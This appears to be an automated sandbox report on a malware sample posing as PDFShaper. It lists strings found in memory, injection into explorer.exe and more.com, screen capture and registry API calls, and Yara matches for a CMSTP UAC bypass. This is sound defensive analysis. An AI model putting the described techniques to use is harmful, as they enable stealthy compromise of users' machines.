                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestamp
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestampNhttps://ca.signfiles.com/TSAServer.aspx
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
                    Source: logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
                    Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/&4D
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/ndows.
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/property#
                    Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/property#HR
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.00000000045BC000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.000000000517D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.com/buy.htmlopenU
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.com/download.htmlopen
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.com/update.verU
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.comP
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.pdfshaper.comopen
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.winsoft.skU
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.xfa.org/schema/xfa-data/1.0/
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://www.xfa.org/schema/xfa-template/
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://xml.org/sax/properties/declaration-handler
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://xml.org/sax/properties/lexical-handler
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: https://ca.signfiles.com/TSAServer.aspx
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: https://www.winsoft.sk
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007661F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,14_2_007661F0

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeCode function: 0_2_00799962 NtQuerySystemInformation,0_2_00799962
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007661F014_2_007661F0
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0076B70014_2_0076B700
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007D80EA14_2_007D80EA
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007651A014_2_007651A0
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0078F3EB14_2_0078F3EB
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0079C46714_2_0079C467
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0076545014_2_00765450
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0078B4B014_2_0078B4B0
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007A167914_2_007A1679
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0079293014_2_00792930
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007A5A7614_2_007A5A76
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007D8A0014_2_007D8A00
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007A5B9614_2_007A5B96
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0079CC0914_2_0079CC09
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007A3DE914_2_007A3DE9
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00764EF014_2_00764EF0
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00789D11 appears 60 times
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0078A560 appears 50 times
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00783F40 appears 136 times
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: invalid certificate
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: Number of sections : 11 > 10
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000055DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000047FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezip.exe( vs 5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeBinary or memory string: OriginalFilenamePDFShaper.exe6 vs 5Z1WFRMTOXRH6X21Z8NU8.exe
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
